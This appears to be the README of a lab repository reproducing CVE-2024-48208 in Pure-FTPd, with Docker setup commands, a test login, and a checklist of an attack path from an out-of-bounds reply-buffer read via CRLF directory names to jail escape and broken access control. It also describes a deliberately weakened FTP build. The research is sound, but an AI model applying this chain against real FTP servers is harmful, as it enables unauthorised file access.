# CVE-2024-48208

The repo contains a dockerfile , to spin up a container for tersting and working on the CVE-2024-48208

### Attack path:
1. Reproduce CVE : done
2. Understand what are we reading from the OOB read: Done(Reading the reply buf)
3. Understand how can the user modify the buffer: Done (The replybuffer contans the reply from the last request)
4. Make a directory with CRLF chars: Done (Python script)
5. Check if the chdir() is successful: Done
6. Setup EPSV mode , and response to check the response: Done (the dirname changes with every exploit rn)
7. Chevck if we can replicate this for restricted directories: (Done with a directory owned by ftpuser2)
8. Present as pivot from the original CVE OOB read to Jail escape/Broken access control: (Done)
9. Exploit automation (Done) 

### Building the environment:

`sudo docker build -t pure-ftpd-vuln .`

`sudo docker run -d -p 21:21 -it --name pure-ftpd-vuln pure-ftpd-vuln`

### Accessing FTP:

Open the terminal , and type `ftp <Docker-Interface-IP>`
Type the following username and password: `ftpuser:test`


### Building FTP locally:

Open the terminal, cd to the pureftpd directory , and type `make; make install`

The pureftpd directory is a modified code for the PoC , with the following modifications:

1. Smaller reply buffer , to make it easier to show a readable filename.
2. Modified response strings, to fit in the smaller buffer.